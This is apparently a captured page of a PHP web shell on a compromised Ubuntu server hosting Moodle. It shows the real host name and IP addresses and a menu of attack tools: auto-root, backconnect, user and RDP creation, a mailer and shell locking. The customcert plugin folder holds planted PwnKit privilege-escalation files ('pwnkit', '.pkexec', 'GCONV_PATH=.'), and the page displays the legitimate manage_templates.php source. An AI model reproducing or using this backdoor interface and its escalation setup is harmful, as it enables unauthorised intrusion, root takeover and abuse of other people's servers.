Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
mod /
customcert /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
amd
[ DIR ]
drwxrwxrwx
backup
[ DIR ]
drwxrwxrwx
classes
[ DIR ]
drwxrwxrwx
db
[ DIR ]
drwxrwxrwx
element
[ DIR ]
drwxrwxrwx
includes
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
mobile
[ DIR ]
drwxrwxrwx
pix
[ DIR ]
drwxrwxrwx
templates
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
yui
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
.travis.yml
1.16
KB
-rwxrwxrwx
CHANGES.md
9.07
KB
-rwxrwxrwx
LICENSE.md
34.32
KB
-rwxrwxrwx
README.md
1.57
KB
-rwxrwxrwx
ajax.php
1.81
KB
-rwxrwxrwx
composer.json
199
B
-rwxrwxrwx
edit.php
9.37
KB
-rwxrwxrwx
edit_element.php
3.86
KB
-rwxrwxrwx
index.php
3.91
KB
-rwxrwxrwx
lib.php
13.33
KB
-rwxrwxrwx
load_template.php
3.86
KB
-rwxrwxrwx
manage_templates.php
4.8
KB
-rwxrwxrwx
mod_form.php
10.03
KB
-rwxrwxrwx
my_certificates.php
3.36
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
rearrange.php
5.57
KB
-rwxrwxrwx
report.php
1.33
KB
-rwxrwxrwx
settings.php
4.59
KB
-rwxrwxrwx
styles.css
1.79
KB
-rwxrwxrwx
upload_image.php
1.84
KB
-rwxrwxrwx
verify_certificate.php
5.2
KB
-rwxrwxrwx
version.php
1.36
KB
-rwxrwxrwx
view.php
7.57
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : manage_templates.php
<?php // This file is part of the customcert module for Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Manage customcert templates. * * @package mod_customcert * @copyright 2016 Mark Nelson <markn@moodle.com> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ require_once('../../config.php'); $contextid = optional_param('contextid', context_system::instance()->id, PARAM_INT); $action = optional_param('action', '', PARAM_ALPHA); $confirm = optional_param('confirm', 0, PARAM_INT); $page = optional_param('page', 0, PARAM_INT); $perpage = optional_param('perpage', 10, PARAM_INT); if ($action) { $tid = required_param('tid', PARAM_INT); } else { $tid = optional_param('tid', 0, PARAM_INT); } if ($tid) { $template = $DB->get_record('customcert_templates', array('id' => $tid), '*', MUST_EXIST); $template = new \mod_customcert\template($template); } $context = context::instance_by_id($contextid); require_login(); require_capability('mod/customcert:manage', $context); $title = $SITE->fullname; $heading = $title; // Set up the page. $pageurl = new moodle_url('/mod/customcert/manage_templates.php'); \mod_customcert\page_helper::page_setup($pageurl, $context, $title); // Additional page setup. if ($tid && $action && confirm_sesskey()) { $PAGE->navbar->add(get_string('managetemplates', 'customcert'), new moodle_url('/mod/customcert/manage_templates.php')); } else { $PAGE->navbar->add(get_string('managetemplates', 'customcert')); } if ($tid) { if ($action && confirm_sesskey()) { $nourl = new moodle_url('/mod/customcert/manage_templates.php'); $yesurl = new moodle_url('/mod/customcert/manage_templates.php', array( 'tid' => $tid, 'action' => $action, 'confirm' => 1, 'sesskey' => sesskey() ) ); // Check if we are deleting a template. if ($action == 'delete') { if (!$confirm) { // Show a confirmation page. $PAGE->navbar->add(get_string('deleteconfirm', 'customcert')); $message = get_string('deletetemplateconfirm', 'customcert'); echo $OUTPUT->header(); echo $OUTPUT->heading($heading); echo $OUTPUT->confirm($message, $yesurl, $nourl); echo $OUTPUT->footer(); exit(); } // Delete the template. $template->delete(); // Redirect back to the manage templates page. redirect(new moodle_url('/mod/customcert/manage_templates.php')); } else if ($action == 'duplicate') { if (!$confirm) { // Show a confirmation page. $PAGE->navbar->add(get_string('duplicateconfirm', 'customcert')); $message = get_string('duplicatetemplateconfirm', 'customcert'); echo $OUTPUT->header(); echo $OUTPUT->heading($heading); echo $OUTPUT->confirm($message, $yesurl, $nourl); echo $OUTPUT->footer(); exit(); } // Create another template to copy the data to. $newtemplate = new \stdClass(); $newtemplate->name = $template->get_name() . ' (' . strtolower(get_string('duplicate', 'customcert')) . ')'; $newtemplate->contextid = $template->get_contextid(); $newtemplate->timecreated = time(); $newtemplate->timemodified = $newtemplate->timecreated; $newtemplateid = $DB->insert_record('customcert_templates', $newtemplate); // Copy the data to the new template. $template->copy_to_template($newtemplateid); // Redirect back to the manage templates page. redirect(new moodle_url('/mod/customcert/manage_templates.php')); } } } $table = new \mod_customcert\manage_templates_table($context); $table->define_baseurl($pageurl); echo $OUTPUT->header(); echo $OUTPUT->heading($heading); $table->out($perpage, false); $url = new moodle_url('/mod/customcert/edit.php?contextid=' . $contextid); echo $OUTPUT->single_button($url, get_string('createtemplate', 'customcert'), 'get'); echo $OUTPUT->footer();
Close